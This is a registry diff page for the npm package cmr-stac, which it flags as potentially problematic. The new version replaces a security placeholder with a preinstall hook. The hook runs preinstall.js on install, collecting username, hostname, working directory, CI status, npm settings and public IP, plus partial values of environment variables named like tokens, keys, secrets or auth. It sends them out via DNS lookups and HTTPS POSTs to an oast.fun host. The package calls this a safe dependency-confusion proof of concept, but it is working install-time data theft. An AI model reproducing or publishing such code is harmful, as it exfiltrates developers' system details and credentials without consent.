cmr-stac 0.0.1-security → 90.10.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of cmr-stac might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +8 -3
  2. package/preinstall.js +75 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "cmr-stac",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "90.10.10",
4
+ "description": "Dependency Confusion PoC – Safe RCE + Beacon",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ },
9
+ "author": "ethical-researcher",
10
+ "license": "ISC"
6
11
  }
package/preinstall.js ADDED
@@ -0,0 +1,75 @@
1
+ const os = require('os');
2
+ const dns = require('dns');
3
+ const https = require('https');
4
+
5
+ const OAST = 'hfdsbugicgbndpfqqiezjvwrs0ltk5icj.oast.fun'
6
+ const MAX_LABEL = 63;
7
+
8
+ // Encode to DNS-safe chunks
9
+ function hexChunks(str) {
10
+ return Buffer.from(str).toString('hex').match(/.{1,63}/g) || [];
11
+ }
12
+
13
+ // Collect system metadata
14
+ const info = {
15
+ user: os.userInfo().username || 'nouser',
16
+ host: os.hostname() || 'nohost',
17
+ cwd: process.cwd(),
18
+ platform: os.platform(),
19
+ arch: os.arch(),
20
+ timestamp: Date.now().toString(36),
21
+ ci: !!process.env.CI || !!process.env.GITHUB_ACTIONS,
22
+ npm_email: process.env['NPM_CONFIG_EMAIL'] || 'noemail',
23
+ npm_registry: process.env['NPM_CONFIG_REGISTRY'] || 'none'
24
+ };
25
+
26
+ // DNS OOB exfiltration
27
+ let domain = [
28
+ ...hexChunks(info.user),
29
+ ...hexChunks(info.host),
30
+ ...hexChunks(info.cwd),
31
+ info.platform,
32
+ info.arch,
33
+ info.ci ? 'ci' : 'local',
34
+ info.timestamp,
35
+ OAST
36
+ ].join('.');
37
+ if (domain.length > 253) domain = domain.slice(0, 253);
38
+
39
+ dns.resolve(domain, () => {}); // asynchronous + stealthy
40
+
41
+ // Pure Node.js: Fetch public IP
42
+ https.get('https://api.ipify.org', (res) => {
43
+ let ip = '';
44
+ res.on('data', chunk => ip += chunk);
45
+ res.on('end', () => {
46
+ const payload = JSON.stringify({ ...info, ip: ip.trim() });
47
+
48
+ const req = https.request({
49
+ hostname: OAST,
50
+ path: '/',
51
+ method: 'POST',
52
+ headers: { 'Content-Type': 'application/json' }
53
+ }, () => {});
54
+ req.on('error', () => {});
55
+ req.write(payload);
56
+ req.end();
57
+ });
58
+ }).on('error', () => {});
59
+
60
+ // Leak environment secrets (first 12 chars for PoC)
61
+ const leaked = Object.entries(process.env)
62
+ .filter(([k]) => /token|key|secret|auth/i.test(k))
63
+ .slice(0, 5)
64
+ .reduce((acc, [k, v]) => ({ ...acc, [k]: v.slice(0, 12) + '...' }), {});
65
+
66
+ if (Object.keys(leaked).length) {
67
+ const req = https.request({
68
+ hostname: OAST,
69
+ path: '/',
70
+ method: 'POST',
71
+ headers: { 'Content-Type': 'application/json' }
72
+ }, () => {});
73
+ req.write(JSON.stringify({ envLeak: leaked }));
74
+ req.end();
75
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=cmr-stac for more information.